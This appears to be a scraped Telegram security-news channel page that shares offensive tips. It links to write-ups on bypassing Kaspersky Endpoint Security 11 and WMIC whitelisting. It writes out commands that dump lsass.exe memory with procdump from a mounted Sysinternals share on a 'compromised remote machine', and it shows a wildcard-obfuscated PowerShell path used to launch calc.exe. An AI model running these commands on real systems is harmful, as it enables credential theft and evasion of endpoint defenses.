Information Security
414 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
sudo kill -9 2018
Bypassing Kaspersky Endpoint Security 11

http://0xc0ffee.io/blog/kes11-bypass
Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter.

net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
popping calc.exe in 2019

C:\> powershell C:\??*?\*3?\c?lc.?x?
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets

https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html